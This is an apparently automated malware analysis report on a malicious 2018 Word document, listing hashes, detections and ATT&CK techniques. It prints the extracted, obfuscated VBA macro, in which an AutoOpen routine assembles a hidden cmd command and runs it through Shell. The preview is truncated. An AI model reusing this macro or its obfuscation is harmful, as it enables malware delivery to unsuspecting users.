Office (OLE) malware analysis — malicious · 3fd39b607e3a59df

MALICIOUS

Office (OLE)

110.9 KB Created: 2018-08-10 18:55:00 Authoring application: Microsoft Office Word First seen: 2018-08-14

MD5: 1a5f00c17bd40da4b6ab785cd6559aab SHA-1: af7bc0e2bbf1f60fec235976d2468caf982e4310 SHA-256: 3fd39b607e3a59dfb9e78bde03a6fde35d3f8cf0d9af00a0ee11b26ac762610d

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. The macro attempts to execute a command using the Shell function, indicating it's likely a downloader or dropper for a second-stage payload. The presence of the AutoOpen macro and the critical ClamAV detection strongly suggest malicious intent.

Heuristics 5

ClamAV: Doc.Malware.Generic-6666973-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6666973-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12762 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12762 bytes
SHA-256: `c4e9bd6a3c9933d80d57061c39aeed6fe5a842967e01ced1a8f2af9b21adcd09`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "VXzoOtZVpkqYRd" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next TypeName Sgn(211519271) TypeName 95 TypeName dwcBFA TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk) TypeName PrhbH Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825 TypeName Oct(7415 + wBbjOc) TypeName Hex(820) End Sub Attribute VB_Name = "HqzoUYE" Function qkocjRXozk() On Error Resume Next TypeName 8 TypeName 5 TypeName CBool(uUwTP / BCNfj + IjllC * Jtdss) pMjuPE = "md" + " /" + "V" + ":" + "ON" + "/" + "C" + CStr(Chr(HkvQaIqZq + jJuaHnM + 34 + OkbwZzio + optdlER)) + "s" TypeName 952 TypeName 177591525 iDYaVqOhNV = "e" + "t #" + " " + " =" + "wjt" + "h" + "MMi" + "M" TypeName Sqr(115314270) TypeName Sqr(ciqCu) jtChbj = "Ur" + "v" + "GUs" + "Cvw" + "HW" + "NTV" + "r" + "p=" + "/" + "xo" + "au-" + "b" TypeName TFrDZY TypeName Log(2157) TypeName 72 YPNfmVUj = "lS9" + "P:)" + "(7" + "n" + "6y}" TypeName 255 TypeName Atn(9305) TypeName Rnd(MmikC) sGYKrBwj = "B;e" + "Fz3" + "1," + "d" + "{Xk" TypeName CLng(NEQiD) TypeName Cos(86757 / Coilz) TypeName Hex(81161 - mpTMsw / GsKWE * KZtrF) ItdcqrhcmO = "gc" + "Y$D" + "m" + " '\" + "IKf" TypeName qwOUw TypeName CSng(MRbjP) TypeName Oct(NIwAIq) IMqDsNdUS = ".q" + "@E" + "+" + "R&" + "&fo" + "r " + "%p" + " in" + " (" TypeName CBool(96112 - ZWZXr + 56737 / CMPwwB) TypeName blzDiW UsqaiVMp = "2" + "3," + "2" + "7,1" + "6," + "46," + "22," + "13" + ",3," + "4" + "6" + ",3" TypeName Atn(67) TypeName CStr(MktFL) TypeName Rnd(8) BKfcBXj = "2" + ",32" + ",62" + ",59" + ",2" + "3," + "6" + "6,4" + "8,2" + "4,4" TypeName 7 TypeName 77 TypeName 17 tBfKuqqDVpC = "0," + "46" + "," + "16," + "3" + "0,2" TypeName Chr(pRVWF / SpiZiZ) TypeName TFQzX TypeName mzsLz zrCEtPV = "7" + ",31" + ",1" + ",4" + "6,5" + "7" TypeName 54 TypeName Sqr(qjLKrw - jEkAnW - 38042 - iGwQl) TypeName CSng(36877 - ADhIXl / 45669 + ZJapLv) psNkbziiCi = "," + "2," + "62" + "," + "1" + "9" + ",46" + ",2," + "6" + "8" + ",18" + "," + "4" TypeName CLng(VuYDvS + 48933 + FCXNT + MSJnO) TypeName 66 TypeName CSng(460072517) PnfWlL = "6," + "3" + "1," + "14" + "," + "3" + "2" + ",6" + "," qkocjRXozk = pMjuPE + iDYaVqOhNV + jtChbj + YPNfmVUj + sGYKrBwj + ItdcqrhcmO + IMqDsNdUS + UsqaiVMp + BKfcBXj + tBfKuqqDVpC + zrCEtPV + psNkbziiCi + PnfWlL TypeName Cos(19996 / tmOFZ * zIPjN - UNMpLc) TypeName Rnd(PNNti) TypeName 423450039 End Function Function SrLJcKU() On Error Resume Next TypeName CStr(pChJp) TypeName 1059 TypeName qmusd vznVCcFb = "46," + "40," + "2," + "45," + "59," + "21," + "71" TypeName Rnd(78) TypeName Round(18040 * zMfzwu) TypeName 9 HQuHjnR = ",67" + ",24" + ",6" + "3," + "3" + ",2," + "2," + "23" + "," TypeName Round(971) TypeName Sin(iGiYL / VYDrKH / 51611 - sblcjm) ljZzjDHRc = "3" + "6,2" + "5,2" + "5" + ",28" + "," + "61" TypeName Sqr(64405 / FfGwoF) TypeName Round(ZTISvQ + HoJrkI) JfrXu = ",46" + ",5" + "2,6" + ",27" + ",4" TypeName APSOm TypeName Rnd(201076278) TypeName 525 JmKwkvO = "0," + "6" + "8" + ",4" + "0," + "4" + "6,2" + ",25" + ",29" + ",1" + "9" TypeName Chr(117133175) TypeName CByte(siCdmB / SRzIT + 28011 / sjFvsE) NBHoJQOXV = "," + "7" + "," + "12" + "," + "49," + "34," + "44" TypeName Cos(59) TypeName cPaoa wDAGGP = ",70" + "," + "3" + ",2," + "2," + "23" + ",3" + "6" + ",25" TypeName 202309463 TypeName Sqr(YpNCC) TypeName 1 jLcazYaNlpm = "," + "25," + "3" + "1" + "," + "6,5" + "7," TypeName kZjddf TypeName CLng(KwzmUa) TypeName CDbl(XbOsu) RtUVbJWOdT = "6," + "57" + "," + "29," + "32," ... (truncated)

SHA-256: c4e9bd6a3c9933d80d57061c39aeed6fe5a842967e01ced1a8f2af9b21adcd09

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "VXzoOtZVpkqYRd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName Sgn(211519271)
   TypeName 95
   TypeName dwcBFA
   TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk)
   TypeName PrhbH
Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825
   TypeName Oct(7415 + wBbjOc)
   TypeName Hex(820)
End Sub


Attribute VB_Name = "HqzoUYE"
Function qkocjRXozk()
On Error Resume Next
TypeName 8
   TypeName 5
   TypeName CBool(uUwTP / BCNfj + IjllC * Jtdss)
pMjuPE = "md" + " /" + "V" + ":" + "ON" + "/" + "C" + CStr(Chr(HkvQaIqZq + jJuaHnM + 34 + OkbwZzio + optdlER)) + "s"
TypeName 952
   TypeName 177591525
iDYaVqOhNV = "e" + "t #" + " " + "  =" + "wjt" + "h" + "MMi" + "M"
TypeName Sqr(115314270)
   TypeName Sqr(ciqCu)
jtChbj = "Ur" + "v" + "GUs" + "Cvw" + "HW" + "NTV" + "r" + "p=" + "/" + "xo" + "au-" + "b"
TypeName TFrDZY
   TypeName Log(2157)
   TypeName 72
YPNfmVUj = "lS9" + "P:)" + "(7" + "n" + "6y}"
TypeName 255
   TypeName Atn(9305)
   TypeName Rnd(MmikC)
sGYKrBwj = "B;e" + "Fz3" + "1," + "d" + "{Xk"
TypeName CLng(NEQiD)
   TypeName Cos(86757 / Coilz)
   TypeName Hex(81161 - mpTMsw / GsKWE * KZtrF)
ItdcqrhcmO = "gc" + "Y$D" + "m" + " '\" + "IKf"
TypeName qwOUw
   TypeName CSng(MRbjP)
   TypeName Oct(NIwAIq)
IMqDsNdUS = ".q" + "@E" + "+" + "R&" + "&fo" + "r " + "%p" + " in" + " ("
TypeName CBool(96112 - ZWZXr + 56737 / CMPwwB)
   TypeName blzDiW
UsqaiVMp = "2" + "3," + "2" + "7,1" + "6," + "46," + "22," + "13" + ",3," + "4" + "6" + ",3"
TypeName Atn(67)
   TypeName CStr(MktFL)
   TypeName Rnd(8)
BKfcBXj = "2" + ",32" + ",62" + ",59" + ",2" + "3," + "6" + "6,4" + "8,2" + "4,4"
TypeName 7
   TypeName 77
   TypeName 17
tBfKuqqDVpC = "0," + "46" + "," + "16," + "3" + "0,2"
TypeName Chr(pRVWF / SpiZiZ)
   TypeName TFQzX
   TypeName mzsLz
zrCEtPV = "7" + ",31" + ",1" + ",4" + "6,5" + "7"
TypeName 54
   TypeName Sqr(qjLKrw - jEkAnW - 38042 - iGwQl)
   TypeName CSng(36877 - ADhIXl / 45669 + ZJapLv)
psNkbziiCi = "," + "2," + "62" + "," + "1" + "9" + ",46" + ",2," + "6" + "8" + ",18" + "," + "4"
TypeName CLng(VuYDvS + 48933 + FCXNT + MSJnO)
   TypeName 66
   TypeName CSng(460072517)
PnfWlL = "6," + "3" + "1," + "14" + "," + "3" + "2" + ",6" + ","
qkocjRXozk = pMjuPE + iDYaVqOhNV + jtChbj + YPNfmVUj + sGYKrBwj + ItdcqrhcmO + IMqDsNdUS + UsqaiVMp + BKfcBXj + tBfKuqqDVpC + zrCEtPV + psNkbziiCi + PnfWlL
   TypeName Cos(19996 / tmOFZ * zIPjN - UNMpLc)
   TypeName Rnd(PNNti)
   TypeName 423450039
End Function
Function SrLJcKU()
On Error Resume Next
TypeName CStr(pChJp)
   TypeName 1059
   TypeName qmusd
vznVCcFb = "46," + "40," + "2," + "45," + "59," + "21," + "71"
TypeName Rnd(78)
   TypeName Round(18040 * zMfzwu)
   TypeName 9
HQuHjnR = ",67" + ",24" + ",6" + "3," + "3" + ",2," + "2," + "23" + ","
TypeName Round(971)
   TypeName Sin(iGiYL / VYDrKH / 51611 - sblcjm)
ljZzjDHRc = "3" + "6,2" + "5,2" + "5" + ",28" + "," + "61"
TypeName Sqr(64405 / FfGwoF)
   TypeName Round(ZTISvQ + HoJrkI)
JfrXu = ",46" + ",5" + "2,6" + ",27" + ",4"
TypeName APSOm
   TypeName Rnd(201076278)
   TypeName 525
JmKwkvO = "0," + "6" + "8" + ",4" + "0," + "4" + "6,2" + ",25" + ",29" + ",1" + "9"
TypeName Chr(117133175)
   TypeName CByte(siCdmB / SRzIT + 28011 / sjFvsE)
NBHoJQOXV = "," + "7" + "," + "12" + "," + "49," + "34," + "44"
TypeName Cos(59)
   TypeName cPaoa
wDAGGP = ",70" + "," + "3" + ",2," + "2," + "23" + ",3" + "6" + ",25"
TypeName 202309463
   TypeName Sqr(YpNCC)
   TypeName 1
jLcazYaNlpm = "," + "25," + "3" + "1" + "," + "6,5" + "7,"
TypeName kZjddf
   TypeName CLng(KwzmUa)
   TypeName CDbl(XbOsu)
RtUVbJWOdT = "6," + "57" + "," + "29," + "32,"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.